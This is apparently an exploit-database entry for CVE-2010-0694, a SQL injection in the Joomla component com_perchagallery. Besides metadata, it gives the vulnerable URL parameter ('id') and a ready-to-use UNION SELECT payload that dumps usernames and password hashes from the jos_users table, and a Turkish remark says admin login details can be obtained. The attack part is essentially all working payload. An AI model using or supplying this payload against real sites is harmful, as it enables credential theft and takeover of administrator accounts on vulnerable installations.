[] NeoSense

Joomla! Component com_perchagallery - SQL Injection

Author: FL0RiX
type: webapps
platform: php
port: 
date_added: 2010-01-05 
date_updated:  
verified: 0 
codes: OSVDB-62574;CVE-2010-0694 
tags: 
aliases:  
screenshot_url:  
application_url: 

########################################################################
# Joomla Component com_perchagallery SQL Injection Vulnerability

######################################################################## #
# Author :FL0RiX
#
# Name : com_perchagallery
#
# Bug Type : SQL Injection
#
# Infection : Admin login bilgileri alinabilir.
#
# Demo Vuln :
#
# http://localhost/index.php?option=com_perchagallery&view=editunidad&id=[EXPLOIT]
#
#EXPLOIT : null/**/union/**/select/**/1,concat(username,0x3a,password)fl0rix,3,4,5,6/**/from/**/jos_users--
########################################################################